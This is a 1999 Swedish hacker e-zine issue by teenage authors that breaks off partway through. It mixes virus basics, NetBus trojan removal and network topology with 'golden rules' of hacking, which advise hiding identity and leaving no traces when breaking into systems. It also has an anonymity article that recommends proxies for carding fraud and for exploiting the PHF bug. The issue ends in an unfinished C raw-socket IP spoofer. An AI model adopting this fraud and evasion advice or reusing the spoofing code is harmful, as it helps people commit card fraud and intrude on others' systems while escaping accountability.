2655 lines
52 KiB
Plaintext
2655 lines
52 KiB
Plaintext
16:51 1999-02-12
|
|
|
|
|
|
|
|
|
|
|
|
Heretics Inc. Presenterar...
|
|
|
|
|
|
|
|
|
|
|
|
O U T L A W I N F O R M A T I V A
|
|
|
|
issue #2
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Sysslar Judar med Carding ?
|
|
|
|
___
|
|
|
|
( )________________________
|
|
|
|
¦ ¦ \ [¯¯¯¯]
|
|
|
|
¦01 ¦ Disclaimer ¦ ¦ H ¦ #Phreak.se
|
|
|
|
¦02 ¦ Ledare ¦ ¦ e ¦
|
|
|
|
¦03 ¦ Medverkande ¦ ¦ r ¦ #Phreakers
|
|
|
|
¦04 ¦ Kommande Projekt ¦__¦ e ¦
|
|
|
|
¦ ¦-------------------------¦ t ¦ #Programming.se
|
|
|
|
¦05 ¦ En flaska Virus ¦ i ¦
|
|
|
|
¦06 ¦ Nätverkstopologier ¦¯¯¦ c ¦ #PhreakCity
|
|
|
|
¦06 ¦ Dom gyllene reglerna ¦ ¦ s ¦
|
|
|
|
¦07 ¦ Annonymitet vid brott ¦ ¦ ¦ #Trada
|
|
|
|
¦ ¦-------------------------¦ ¦ I ¦
|
|
|
|
¦08 ¦ C-Skåp med 5 fingrar ¦ ¦ n ¦ #Swehack
|
|
|
|
¦09 ¦ Telia med GSM ¦ ¦ c ¦
|
|
|
|
¦10 ¦ Säkerhetsbrister i GSM ¦ [____]
|
|
|
|
¦11 ¦ Fiberoptik för Newbies ¦
|
|
|
|
¦12 ¦ Hemliga frekvenser ¦
|
|
|
|
¦13 ¦ Svensk Beige Boxing ¦
|
|
|
|
¦ ¦-------------------------¦
|
|
|
|
¦14 ¦ Programstrukturer ¦
|
|
|
|
¦ ¦-------------------------¦
|
|
|
|
¦15 ¦ Ett par IRCnet kanaler ¦
|
|
|
|
¦16 ¦ Köpes och Säljes ¦
|
|
|
|
¦17 ¦ Frågor och kanske svar ¦
|
|
|
|
¦18 ¦ Copyright ¦
|
|
|
|
¦19 ¦ Prenumeration ¦
|
|
|
|
(___)··························
|
|
|
|
www.heretics.freeservers.com
|
|
|
|
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[01] Disclaimer knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Denna information är endast skriven som underhållning och informations
|
|
|
|
syfte. Denna information kan vara olaglig så vi tar inget ansvar för
|
|
|
|
dina handlingar med denna information.
|
|
|
|
|
|
|
|
|
|
|
|
____________________________OBS!__________________________
|
|
|
|
Det är absolut förbjudet för alla myndighetspersoner och
|
|
|
|
personer utsedda av dessa att läsa detta e-zine utan min
|
|
|
|
skriftliga tillåtelse eller order om husrannsakan.
|
|
|
|
Överträdelse leder till att all information publicerad här
|
|
|
|
kommer att underkännas som bevisföring i svensk domstol
|
|
|
|
enligt Svea Rikes Lag. När jag bryter mot PUL gör jag det
|
|
|
|
i egenskap av journalist el. konstnär, välj själv vilket.
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[01] Ledare knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Tjenare, nu ett tag efter 1:a numret så släpps detta nummer, 1:a numret
|
|
|
|
blev stort och det var ju också meningen. OverMarZz joinar gruppen
|
|
|
|
eftersom han är aktiv och kommer att hjälpa till med diverse saker.
|
|
|
|
Nu börjar det sega ner i min programmering igen, jag måste börja satsa
|
|
|
|
på allvar. På senaste tiden har jag privat utbildat mig i
|
|
|
|
Telekommunikation. Men när det blir något lov eller liknande så ska
|
|
|
|
jag bli antisocialist och ta tag i programmeringen. Jag vill ju
|
|
|
|
verkligen lära mig, men det går segt eftersom det är avancerat och inte
|
|
|
|
minst för mig som är 13 år. Folk säger att jag ska börja med Pascal och
|
|
|
|
Vbasic men jag vill syssla med avancerade språk, spelar ingen roll hur
|
|
|
|
avancerat det är, jag kommer att ha mera nytta av C++ i framtiden, både
|
|
|
|
när jag ska söka jobb och i privata projekt som t.ex. socket
|
|
|
|
programmering som är mycket bra i C++. 114 prenumeranter på Outlaw
|
|
|
|
Informativa på inte alls speciellt kort tid, men förhoppningvis kommer
|
|
|
|
dessa att bli flera.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[02] Medverkande knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
|
|
|
|
¤ Knash
|
|
|
|
¤ knash@linux.nu
|
|
|
|
¤ Founder
|
|
|
|
|
|
|
|
¤ OverMarZz_
|
|
|
|
¤ mixtile112@hotmail.com
|
|
|
|
¤ Member
|
|
|
|
|
|
|
|
¤ crazy-train (Evil^Phreakz0r)
|
|
|
|
¤ crazy-train@telia.se
|
|
|
|
¤ Proud Member =)
|
|
|
|
|
|
|
|
¤ Dreamfish
|
|
|
|
¤ Dark_Side@death-star.com
|
|
|
|
¤ Member
|
|
|
|
|
|
|
|
¤ TheClown
|
|
|
|
¤ orkar@inte
|
|
|
|
¤ Inte medlem, bidrog med en artikel.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[03] Kommande Projekt knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Jag håller på att skriva en textfil om Säkerhet, grundläggande info
|
|
|
|
kommer det då att bli. Jag kommer att ta upp ämnen som Virus, Trojaner
|
|
|
|
, Brandväggar, Kryptering. Om det är någon som har information om
|
|
|
|
Nätverks Säkerhet så skicka det direkt till knash@linux.nu. Jag letar
|
|
|
|
även efter information om Firewalls, alltså hur man ska konfiguera dem
|
|
|
|
och så.
|
|
|
|
|
|
|
|
______________________________________________________
|
|
|
|
{Information wants to be Free, Knowledge is not a Crime}
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[04] En flaska Virus knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Här kommer lite enkel grundläggande information kring Virus även lite
|
|
|
|
information om Trojaner följer.
|
|
|
|
|
|
|
|
¤ Skydd mot Virus
|
|
|
|
|
|
|
|
Det finns olika slags skydd mot Virus, det bästa skyddet är att låta bli
|
|
|
|
att ladda hem filer från opålitliga websidor och alltid kontrollera
|
|
|
|
disketter och andra lagrings diskar. Men det går att andvända mjukvara
|
|
|
|
som söker efter Virus på diskar och i minnet. Själv andvänder jag
|
|
|
|
Dr Solomon's Anti Virus Toolkit som jag tycker fungerar bra, om du köper
|
|
|
|
det så får du en diskett i brevlådan gratis varje gång då Virus
|
|
|
|
databasen uppdateras. Men Dr Solomon's är då inte den enda,
|
|
|
|
McAfee Anti-Virus, eSafe, F-PROT Professional Anti-Virus Toolkit och
|
|
|
|
Panda AntiVirus för att bara nämna några.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Makrovirus
|
|
|
|
|
|
|
|
Makroviruset kan smitta alla typer av operativ system, viruset sprider
|
|
|
|
sig via Word 6.0 filer. För att skydda sig så kan ett AntiVirus program
|
|
|
|
andvändas, ett tips är att andvända ett nytt AntiVirus program eftersom
|
|
|
|
Makrovirus är en ny typ av Virus.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Partitionssektor Virus
|
|
|
|
|
|
|
|
Partionsektorn är den första delen som datorn läser när den startar
|
|
|
|
datorn. Partionsektorn är mycket känslig för radering av info eftersom
|
|
|
|
den innehåller information om skivan (såsom antalet sektorer i varje
|
|
|
|
partition och var DOS-partitionen börjar), och ett litet program. När
|
|
|
|
PC:n startar läser den partitionssektorn, laddar programmet till minnet
|
|
|
|
och kör det. Partionsektor virus är som ett Bootsektor virus bara att
|
|
|
|
det är svårare att hitta. Många program som kontrollerar lagrings skivor
|
|
|
|
(t.e.x DEBUG) tillåter inte att kolla på partionsektorn. Disktetter har
|
|
|
|
ingen partionsektor så Partionsektor virus beter sig exakt som ett
|
|
|
|
Bootsektor virus.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Bootsektor Virus
|
|
|
|
|
|
|
|
Bootsektorn är den första delen på en Diskett och på en hårdisk är den
|
|
|
|
den första delen på DOS-Partionen, den innehåller information om disken
|
|
|
|
eller disketten (såsom t.ex. antalet sektorer i den logiska enheten)
|
|
|
|
När datorn startas läser den Boot-partionen från den disk som angetts i
|
|
|
|
BIOS Setup (A: som standard) om den inte hittar den så läser den nästa
|
|
|
|
disk (C: som standard) när den hittar ett program så laddar den det i
|
|
|
|
minnet och kör igång det. Ett Bootsektor virur fungerar på så sätt att
|
|
|
|
den ersätter Bootsektorn med sin egen kod och flyttar sen den gamla
|
|
|
|
Bootsektorn någon annanstanns. När viruset lagt sig bekvämt i
|
|
|
|
Bootsektorn så startar det varje gång datorn startar. Dom flesta
|
|
|
|
Bootsektor virus infekterar bara disketter men det finns även dom som
|
|
|
|
infekterar hårdiskar. Master Boot Record är ett exempel på ett Virus som
|
|
|
|
infekterar hårdiskar och AntiExe är ett exempel på ett Bootsektor Virus
|
|
|
|
som infekterar disketter.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Överskrivande Virus
|
|
|
|
|
|
|
|
Gör precis som titeln säger skriver över filer så som systemfiler och
|
|
|
|
befintliga filer i systemet. Överskrivande Virus sprider sig inte så
|
|
|
|
snabbt eftersom dom lätt kan upptäckas. HLLO är en familj med
|
|
|
|
överskrivande i virus och alla är skrivna i högnivåspråk.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Kombinationsvirus
|
|
|
|
|
|
|
|
Är ett Virus som andvänder sig mera än 1 för att sprida sig och
|
|
|
|
infektera körbara filer, bootsektorn och partionsektorn. Som normalt kan
|
|
|
|
detta virus inte föröka sig i Windows 95.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Droppers
|
|
|
|
|
|
|
|
En Dropper är egentligen inte ett virus utan den får dig tro göra något
|
|
|
|
medans den gör något annat, i vanliga fall installerar ett Virus medans
|
|
|
|
den visar upp ett flashigt demo.
|
|
|
|
theipspoof.zip på 310229 bytes som innehåller 2 filer, Spoof.dmo på
|
|
|
|
124928 bytes och IPSpoof.exe på 64000 bytes. Vem vill inte vara anonym ?
|
|
|
|
Denna IP Spoofer i själva fallet en Back Orifice trojan. Det står på
|
|
|
|
många underground relaterade sidor att detta är den bästa IP Spoofern
|
|
|
|
på marknanden.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Worm
|
|
|
|
|
|
|
|
Ett virus som kopierar sig själv, behöver inte nödvändigtvis vara ett
|
|
|
|
Virus. Worms och Virus brukar ofta kombineras. The Morris Worm som höll
|
|
|
|
på att sänka hela Internet, eller på den tiden ARPANET som det hette.
|
|
|
|
The Morris Worm var skriven av Robert T. Morris som studerade på
|
|
|
|
Cornell University. Wormen skapade en anslutning till en dator och
|
|
|
|
kopierade sig själv till den kommande dator för att sedan sprida sig
|
|
|
|
vidare. Det finns mycket inforamtion om "The Morris Worm" det är bara
|
|
|
|
söka efter det om du tycker att denna information inte räckte till.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Netbus
|
|
|
|
|
|
|
|
Netbus är en trojan som är precis som på namnet en Nät Buss. Netbus
|
|
|
|
består av en server och en klient.
|
|
|
|
|
|
|
|
Namn: Storlek: Status:
|
|
|
|
Path.exe 472 576 bytes Server
|
|
|
|
NetBus.exe 567 296 bytes Klient
|
|
|
|
NetBus.rtf 24 113 Dokumenation
|
|
|
|
|
|
|
|
Path.exe
|
|
|
|
|
|
|
|
Kan döpas om till vilket namn som helst. Ikonen är en blå ring med en
|
|
|
|
brinnande grå fackla på. Servern lägger sig i Registret (User.dat och
|
|
|
|
System.dat) Registret kan hanteras med C:\Windows\regedit.exe.
|
|
|
|
När servern är installerad så ligger den i...
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
\run innehåller sträng värden för program som automatiskt ska startas
|
|
|
|
när datorn startas. För att ta bort server (eller patchen) så går det
|
|
|
|
ner i dos läge, alltså Start/Avlsuta/Starta om datorn i MS-DOS läge.
|
|
|
|
du handlar antagligen i C:\Windows när datorn ligger i DOS läge så
|
|
|
|
därför skriver du följande.
|
|
|
|
|
|
|
|
Microsoft(R) Windows 95
|
|
|
|
(C)Copyright Microsoft Corp 1981-1996.
|
|
|
|
|
|
|
|
C:\WINDOWS>rm patch.exe
|
|
|
|
|
|
|
|
Detta beror självklart på serverns namn. För att leta efter server så
|
|
|
|
trycker du på Start/Sök/Filer eller mappar/ sen trycker du på Bläddra
|
|
|
|
och väljer C:\Windows. Skriv sedan in *.*exe i Namn fältet. Det kommer
|
|
|
|
följas av en massa program listas och nu är det bara leta efter
|
|
|
|
servern. Det du ska kolla efter är ikonen som beskrivs ovan.
|
|
|
|
|
|
|
|
Ett annat tips om du enbart vill skydda dig är att sätta kontroll för
|
|
|
|
på porten som Netbus andvänder. Den porten Netbus andvänder är 12345
|
|
|
|
och kan blockeras med Nuke Nabber2.x. Du börjar med att klicka dig
|
|
|
|
fram till File/Options/Advanced. Klick a på "unassigned" och vid
|
|
|
|
"Port to monitor" skriver du in "12345" som är den porten Netbus
|
|
|
|
andvänder och vid "Protocol" väljer du "tcp"
|
|
|
|
Det kommer att se ut så här om någon ansluter...
|
|
|
|
|
|
|
|
[02/05/1999 17:19:47.340 GMT+0100] Connection: localhost.swip.net (127.
|
|
|
|
0.0.1) on port 12345 (tcp).
|
|
|
|
[02/05/1999 17:19:55.680 GMT+0100] Disconnect: localhost.swip.net (127.
|
|
|
|
0.0.1) on port 12345 (tcp).
|
|
|
|
|
|
|
|
Lägg märke till att jag andvänd radbryte ovan !
|
|
|
|
|
|
|
|
|
|
|
|
Jag har läst att man kan ta bort Netbus genom att ta bort nyckeln
|
|
|
|
/nomsg i registret. Jag antar att du endast behöver söka efter den,
|
|
|
|
alltså Redigera/Sök
|
|
|
|
|
|
|
|
Om du vill veta om du har Netbus över huvudtaget så kan du andvända
|
|
|
|
telnet för att ansluta till just den porten som andvänds. Parametrarna
|
|
|
|
är enkla, tryck Start/Kör och skriv sedan in "telnet localhost 12345"
|
|
|
|
Du kan även skriva "telnet 127.0.0.1 det är samma som localhost.
|
|
|
|
Localhost menas alltså den lokala dator (den datorn du andvänder)
|
|
|
|
|
|
|
|
Nu har jag gjort en idiot förklaring till hur man blir av med Netbus,
|
|
|
|
så nu borde alla fatta. Den bestä säkerheten är ändå att aldrig ta emot
|
|
|
|
filer som du inte vet vad dom innehåller. Du ska inte heller lita på
|
|
|
|
någon om han/hon säger att det är ett demo eller spel.
|
|
|
|
|
|
|
|
|
|
|
|
¤ Netbuster
|
|
|
|
|
|
|
|
Netbuster är som på namnet ett program som stoppar andvändare
|
|
|
|
och är programmerat av Håkan Bergström. Vilka funktioner har Netbuster
|
|
|
|
då ? Netbuster kan scanna registrets autostart och även i minnet efter
|
|
|
|
Netbus servern och som du vet så kan man med Netbus visa bilder, spela
|
|
|
|
upp ljud och ladda hem/upp filer på hårdisken. Vid fliken Files finns
|
|
|
|
det lite inställningar så du kan visa saker som egentligen inte finns.
|
|
|
|
Om en andvändare skulle ansluta till din dator med Netbus, så kan han
|
|
|
|
ta en Skärmdump mycket enkelt, i Netbuster kan du istället göra så en
|
|
|
|
annan bild visas upp. Om någon skulle skicka ett message så kan du
|
|
|
|
istället stället ställa in så Netbuster skickar ett message till
|
|
|
|
andvändaren, inställningar sker under fliken Messages. Under fliken
|
|
|
|
Logfile visas logg filen. I logg filen så finner du all information
|
|
|
|
vem som anslutit till din dator och när personen ansluter.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[05] Nätverkstopologier crazy-train ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Med nätverkstopologi menas det geometriska utseende som utgörs av nätets
|
|
|
|
media, enheter och noder. De vanligaste topologierna är:
|
|
|
|
|
|
|
|
¤ BUS-nät
|
|
|
|
|
|
|
|
¤ Stjärnnät
|
|
|
|
|
|
|
|
¤ Ringnät
|
|
|
|
|
|
|
|
¤ Slingnät
|
|
|
|
|
|
|
|
|
|
|
|
o BUS-Nät
|
|
|
|
|
|
|
|
BUS tekniken är ett utvecklingssteg från datorernas överförings-BUS som
|
|
|
|
"adopterats" av LAN-tekniken. I datorerna sker överföring av information
|
|
|
|
med parallell-BUS, dvs alla bit i den operationen eller det ASCII-tecken
|
|
|
|
som skall transporteras tillsammans med kontroll informationen, sker i
|
|
|
|
ett "svep". I ett LAN kan ej denna teknik användas, informationen sänds
|
|
|
|
istället seriellt med hög hastighet.
|
|
|
|
|
|
|
|
I ett BUS-nät är samtliga noder anslutna till en gemensam kabel, den sk
|
|
|
|
transmissions-BUS. Det förekommer två tekniker, basband och bredband.
|
|
|
|
Signifikant för BUS-nätet är att det meddelande som sändande nod ger
|
|
|
|
upphov till, samtidigt mottages av alla övriga noder. Endast den
|
|
|
|
utrustning som meddelandet är destinerat till, känner igen adressen och
|
|
|
|
tar emot meddelandet. Metodiken är analog med ett POLL-SELECT system där
|
|
|
|
värddatorn i tur och ordning POLLAR anslutna terminaler och styrenheter
|
|
|
|
(CLUSTER). BUS-topologin kallas också för trädtopologi.
|
|
|
|
|
|
|
|
o Stjärnnät
|
|
|
|
|
|
|
|
I ett stjärnnät har varje ansluten nod sin unika förbindelse till en för
|
|
|
|
alla övriga noder och förbindelser gemensam central nod. Ett representa-
|
|
|
|
tivt exempel på stjärnnät, är de abbonentväxlar som överför både data
|
|
|
|
och talkommunikation (PRIVATE AUTOMATIX BRANSCH EXCHANGE - PABX). I den
|
|
|
|
generation abbonentväxlar som är tillgänglig i Sverige, används digital
|
|
|
|
programmeringsstyrd teknik. Detta har gjort det möjligt att även använda
|
|
|
|
växlarna för dataöverföring. I abbonentledningens termineringspunkt
|
|
|
|
finns det en speciell telefonutrustning, till vilken en terminal med
|
|
|
|
standardiserat gränssnitt kan kopplas in. I PABX:erna finns det en
|
|
|
|
utrustning sin separerar data och tal. Oberoende av varandra kan tal och
|
|
|
|
data fördmedlas på samma trådpar.
|
|
|
|
|
|
|
|
Räckvidden för lokalabonnentledning är c:a 1-2 Km vilket gör att nätet
|
|
|
|
kan ha sin spridning inom en viss radie. Genom utrbrutna väljarsteg som
|
|
|
|
lokaliseras på andra platser, kan PABX nätet ökas i räckvidd och
|
|
|
|
omfattning. För extern datatrafik förses PABX:en med en gemensam resurs
|
|
|
|
som består med ett antal modem i en POOL för trafik på det allmänna
|
|
|
|
telenätet (internet).
|
|
|
|
|
|
|
|
o Ringnät
|
|
|
|
|
|
|
|
Vid ett ringnät är varje nod ansluten till en långserie av
|
|
|
|
sammankopplade punkt-till-punkt förbindelser. Varje nod är förbunden med
|
|
|
|
närmast förgående och efterföljande nod. Datatrafiken cirkulerar runt i
|
|
|
|
ringen från nod till nod där signaöen regenereras och förstärks innan
|
|
|
|
den sänds vidare. Fördröjningen inom varje nod blir mycket kort, endast
|
|
|
|
några få bit då ej hela meddelandet buffras i noderna. När ett
|
|
|
|
meddelande nåt adressatnod och har godkänts, plockas det bort ur den
|
|
|
|
ändlösa dataströmmen. Överföringshastigheterna på mediat ligger inom
|
|
|
|
intervallet 1-10 Mbit/s. De vanligaste accessmetoderna i ett ringnät är:
|
|
|
|
|
|
|
|
*Token Passing
|
|
|
|
|
|
|
|
*Slotted Ring
|
|
|
|
|
|
|
|
*Empty Slot.
|
|
|
|
|
|
|
|
*Register Insert.
|
|
|
|
|
|
|
|
En huvudnod på ringen kontrollerar och övervakar trafiken och kan
|
|
|
|
ingripa vid felsituationer. Nackdelen med ett ringnät är att ett avbrott
|
|
|
|
på förbindelsen försätter hela nätet ur funktion. För att säkerställa
|
|
|
|
detta, är ringnäten i bland konstruerade med dubbla ringar, Med ett
|
|
|
|
dubbelt ringnät kan man också klara montering av nya noder i "flykten"
|
|
|
|
trots att datatrafik pågår. Aktiva komponenter ingår i noderna och om en
|
|
|
|
nod slutar att fungera, kan också nätet försättas ur funktion. För att
|
|
|
|
förebygga datta är noderna vid f eltilfällen och nätspänningsfrånfall.
|
|
|
|
|
|
|
|
o Slingnät
|
|
|
|
|
|
|
|
Ett slingnät kan liknas vid en enkelspårig järnvägslinje där data trans-
|
|
|
|
porteras mellan stationer och linjens ändhållplatser. En markant
|
|
|
|
skillnad mellan sling och ringnät, är slingnätets centrala nod som styr
|
|
|
|
och övervakar trafiken. Möjligheten till direkttrafik mellan övriga
|
|
|
|
noder finns ej.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ÖVERFÖRINGSMEDIA.
|
|
|
|
|
|
|
|
Mediat är bäraren av all information i ett datanät. Det finns ett
|
|
|
|
flertal att upprätta ett LAN.
|
|
|
|
|
|
|
|
*Tvinnade par (Twisted pair)
|
|
|
|
*Flatkabel
|
|
|
|
*Fiberoptik
|
|
|
|
*Koaxialkabel
|
|
|
|
- Enkabel
|
|
|
|
- Tvåkabel
|
|
|
|
*Infraröd överföring
|
|
|
|
*Radioöverföring
|
|
|
|
- mikrovåg
|
|
|
|
- radiolänk
|
|
|
|
- satellit
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[06] Dom gyllene reglerna (inom hacking Dreamfish ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Så vitt som jag har förstått så är en majoritet av våra kära läsare
|
|
|
|
intresserade av datorer (Bra att jag har förstått) och oxå intresserade
|
|
|
|
av att kunna bryta sig in i andras datasystem ...Men vad är det om man
|
|
|
|
inte vet dom oskrivna reglerna. Om du är väl införstådd inom ämnet
|
|
|
|
hacking ,så sluta läs nu och hoppa över till nästa artikel. Det här är
|
|
|
|
för dom på inlärningsstadiet. Nåväl här börjar vi.......
|
|
|
|
|
|
|
|
1. Skada aldrig ett system .
|
|
|
|
Varför ?:
|
|
|
|
Jo först och främst så klassas du inte längre som en hacker vi har nu
|
|
|
|
bytt till det inte lika glamourösa cracker. Vad mer ,jo den som har
|
|
|
|
blivit crackad känner ett större behag att hämnas.
|
|
|
|
|
|
|
|
2. Ändra inte i andras systemfiler ,förutom dom som kan påvisa att dom
|
|
|
|
befunnit dig i Han/Hon/Deras dator och dom som kan ge dig fortsatt
|
|
|
|
access.
|
|
|
|
Varför?:
|
|
|
|
Ändra inte kopiera istället ,för ändringar behövs inte om du inte
|
|
|
|
känner för att lämna lockbete efter dig själv.
|
|
|
|
|
|
|
|
3. Dela inte information om dina projekt med sådana du inte kan lite
|
|
|
|
fullt ut på .
|
|
|
|
Varför?:
|
|
|
|
Har du aldrig blivit tillfrågad att utge någons namn för att det är
|
|
|
|
bäst för den själv. Dom man känner har alltid ett hopp på en
|
|
|
|
varesig man skall bättra sig eller göra ett bättre hack nästa gång.
|
|
|
|
|
|
|
|
4. När du "sätter en lapp på anslagstavlan" (BBS = Bulletin Board
|
|
|
|
Systems) Var så försiktig som möjlig med dina beskrivningar om vad
|
|
|
|
du gjort som möjligt.
|
|
|
|
V?:
|
|
|
|
BBS kan avlyssnas ...Om du inte visste det redan (Reds.amm).
|
|
|
|
|
|
|
|
5. Använd ALDRIG ditt riktiga namn eller telenr när du chattar på
|
|
|
|
Irc/Icq .
|
|
|
|
V?:
|
|
|
|
Kan du inte lista ut det själv. =)
|
|
|
|
|
|
|
|
6. Lämna aldrig ditt underskrift/Tag eller dylikt när du hackar.
|
|
|
|
V?:
|
|
|
|
Vi vet hur det gick för tjuven i Rosa Pantern filmerna ..
|
|
|
|
|
|
|
|
7. Hacka dig aldrig in i statsägda datorer.
|
|
|
|
V:?
|
|
|
|
Staten har den grymmaste datastyrkan i landet , din dator är nada mot
|
|
|
|
deras.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[07] Annonymitet vid datorbrott OverMarZz ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Rapport klar: 04:36 9 february 1999
|
|
|
|
overmarzz@level8.com
|
|
|
|
Http://www.level8.com
|
|
|
|
|
|
|
|
Introduktion: Anledningen till att jag fick ett flipp och började på
|
|
|
|
denna filen är enkel, dom flesta lamers, newbies och wannabies
|
|
|
|
använder program som "Win spoof" med mera när dom vill vara anonyma,
|
|
|
|
Men de flesta av de programmen funkar inte.
|
|
|
|
Och när dom loggar in som anonymos login tror dom att dom verkligen är
|
|
|
|
anonyma. Det finns många sätt att vara annonym på, jag har skrivit
|
|
|
|
några grunder här men om man är proffs inom tcp/ip så skrattar man nog
|
|
|
|
en bra stund åt denna texten.
|
|
|
|
|
|
|
|
Jag frånsäger mig inte något som helst ansvar för att meningen är att
|
|
|
|
inget ska hända därmed inget ansvar.
|
|
|
|
|
|
|
|
1) Ip spoofing
|
|
|
|
1.1 Dölj din ip genom en proxy server
|
|
|
|
1.2 Shell kod till en ip spoofer för linux
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
|
|
|
|
(1)
|
|
|
|
Ip spoofing
|
|
|
|
|
|
|
|
Detta är bra vid bedrägeri på hemsidor såväl vid "Carding"
|
|
|
|
som vid utnyttjande av exp PHF buggen.
|
|
|
|
|
|
|
|
1.1 Via en Proxy
|
|
|
|
|
|
|
|
Gå in i Ms-dos prompten och skriv ping proxy.algonet.se
|
|
|
|
om du då får medelandet 'bad IP' eller nåt i den stilen så menas det
|
|
|
|
att det helt enkelt inte finns nån proxy där, men om du får ett icmp
|
|
|
|
echo så finns det en.
|
|
|
|
Hotmail och aol har sådana som är användar vänliga, försök på dom.
|
|
|
|
Omdu kör linux så antar jag var du använder kommandot 'ping'.
|
|
|
|
|
|
|
|
I Netscape, tryck på Options|Network Preferences (förutsatt att du har
|
|
|
|
En engelsk version) klicka sen på Proxy fliken och kolla radio button
|
|
|
|
'Manual Proxy config' och tryck sen 'view'. Ställ nu in det för det
|
|
|
|
protocollet du vill använda, (vissa Proxies använder bara HTTP)
|
|
|
|
oftast finns där att välja mellan FTP och HTTP. Den vanligaste porten
|
|
|
|
som proxies använder är 8080 men inte nödvändigtvis
|
|
|
|
|
|
|
|
I Internet Explorer, tryck på View|Options|
|
|
|
|
Tryck sen 'Connection' fliken och sätt upp det som i netscape.
|
|
|
|
|
|
|
|
Nu kommer inte din Ip adress visas i Guestbooks, counterlogs, ftp och
|
|
|
|
http. Du kan maila i tex hotmail anonymt nu eller carda nån stans utan
|
|
|
|
bekymmer
|
|
|
|
|
|
|
|
1.2 Ip spoofer för linux
|
|
|
|
|
|
|
|
Denna är skiven i C, för linux.
|
|
|
|
|
|
|
|
***
|
|
|
|
|
|
|
|
#include <sys/types.h>
|
|
|
|
#include <sys/socket.h>
|
|
|
|
#include <netinet/in_systm.h>
|
|
|
|
#include <netinet/in.h>
|
|
|
|
#include <netinet/ip.h>
|
|
|
|
#include <netinet/tcp.h>
|
|
|
|
#include <netinet/ip_icmp.h>
|
|
|
|
#include <netdb.h>
|
|
|
|
|
|
|
|
unsigned short ip_cksum(unsigned char * buff, int len)
|
|
|
|
{
|
|
|
|
unsigned long sum = 0;
|
|
|
|
if (len > 3)
|
|
|
|
{
|
|
|
|
__asm__("clc\n"
|
|
|
|
"1:\t"
|
|
|
|
"lodsl\n\t"
|
|
|
|
"adcl %%eax, %%ebx\n\t"
|
|
|
|
"loop 1b\n\t"
|
|
|
|
"adcl $0, %%ebx\n\t"
|
|
|
|
"movl %%ebx, %%eax\n\t"
|
|
|
|
"shrl $16, %%eax\n\t"
|
|
|
|
"addw %%ax, %%bx\n\t"
|
|
|
|
"adcw $0, %%bx"
|
|
|
|
: "=b" (sum) , "=S" (buff)
|
|
|
|
: "0" (sum), "c" (len >> 2) ,"1" (buff)
|
|
|
|
: "ax", "cx", "si", "bx" );
|
|
|
|
}
|
|
|
|
if (len & 2)
|
|
|
|
{
|
|
|
|
__asm__("lodsw\n\t"
|
|
|
|
"addw %%ax, %%bx\n\t"
|
|
|
|
"adcw $0, %%bx"
|
|
|
|
: "=b" (sum), "=S" (buff)
|
|
|
|
: "0" (sum), "1" (buff)
|
|
|
|
: "bx", "ax", "si");
|
|
|
|
}
|
|
|
|
if (len & 1)
|
|
|
|
{
|
|
|
|
__asm__("lodsb\n\t"
|
|
|
|
"movb $0, %%ah\n\t"
|
|
|
|
"addw %%ax, %%bx\n\t"
|
|
|
|
"adcw $0, %%bx"
|
|
|
|
: "=b" (sum), "=S" (buff)
|
|
|
|
: "0" (sum), "1" (buff)
|
|
|
|
: "bx", "ax", "si");
|
|
|
|
}
|
|
|
|
sum =~sum;
|
|
|
|
return(sum & 0xffff);
|
|
|
|
}
|
|
|
|
|
|
|
|
unsigned short tcp_check(struct tcphdr *th, int len,
|
|
|
|
unsigned long saddr, unsigned long daddr)
|
|
|
|
{
|
|
|
|
unsigned long sum;
|
|
|
|
__asm__("
|
|
|
|
addl %%ecx, %%ebx
|
|
|
|
adcl %%edx, %%ebx
|
|
|
|
adcl $0, %%ebx
|
|
|
|
"
|
|
|
|
: "=b"(sum)
|
|
|
|
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
|
|
|
|
: "bx", "cx", "dx" );
|
|
|
|
__asm__("
|
|
|
|
movl %%ecx, %%edx
|
|
|
|
cld
|
|
|
|
cmpl $32, %%ecx
|
|
|
|
jb 2f
|
|
|
|
shrl $5, %%ecx
|
|
|
|
clc
|
|
|
|
1: lodsl
|
|
|
|
adcl %%eax, %%ebx
